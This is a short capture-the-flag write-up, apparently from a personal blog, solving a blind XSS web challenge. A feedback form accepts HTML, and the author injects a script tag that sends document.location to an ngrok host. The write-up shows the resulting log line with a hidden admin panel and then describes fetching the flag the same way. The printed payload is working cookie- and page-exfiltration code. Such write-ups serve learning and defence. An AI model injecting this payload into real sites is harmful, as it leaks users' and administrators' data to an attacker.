Home

Web - bxss

Date: 09, June, 2021

Author: Dhilip Sanjay S

Category: Web

  • The feedback page in the website was accepting html tags as input.

  • If there was url in the input, like inside <img> and <script> tags, the server was making request to that URL.

Using ngrok

  • Using ngrok, I tried to fetch the document.cookie at first.

  • But there was no cookie. (May be the cookie had HttpOnly flag)

  • Then found the document.loction using the same:

<script>document.location='http://1659bf86e1d6.ngrok.io?c='+document.location</script>

  • There was a secret admin cookie panel at http://0.0.0.0:8080:

127.0.0.1 - - [09/Jun/2021 15:28:46] "GET /?c=http://0.0.0.0:8080/Secret_admin_cookie_panel HTTP/1.1" 200 -

Fetching flag

  • By using fetch API in javascript, the flag can be fetched from http://0.0.0.0:8080/flag

  • And then the response can be sent to ngrok:

  • The request had the flag:

PreviousMisc - Small Maniac's GameNextWeb - Sparta

Last updated